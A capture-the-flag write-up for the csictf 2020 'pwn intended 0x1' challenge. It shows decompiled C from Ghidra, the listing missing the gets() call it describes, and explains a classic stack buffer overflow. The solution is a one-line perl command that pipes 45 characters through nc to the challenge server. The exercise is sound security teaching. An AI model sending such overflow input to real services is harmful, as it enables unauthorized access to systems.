Tags: bof pwn 


## Description

I really want to have some coffee!

nc chall.csivit.com 30001

## Analysis

Decompile with Ghidra. `main()` is very simple:

undefined8 main(void)
char local_38 [44];
int local_c;

local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
return 0;

This is the "hello world" of buffer overflows. It accepts input via `gets()` into a `local_38` buffer that holds 44 chars, and immediately after that on the stack is `local_c` which just has to be non-zero to get the flag. All you have to do is enter 45 chars of input.

## Solution

kali@kali:~$ perl -e 'print "A"x45 . "\n"' | nc chall.csivit.com 30001
Please pour me some coffee:


Oh no, you spilled some coffee on the floor! Use the flag to clean it.

Original writeup (https://github.com/dobsonj/ctf/tree/master/writeups/2020/csictf/pwn_intended#pwn-intended-0x1).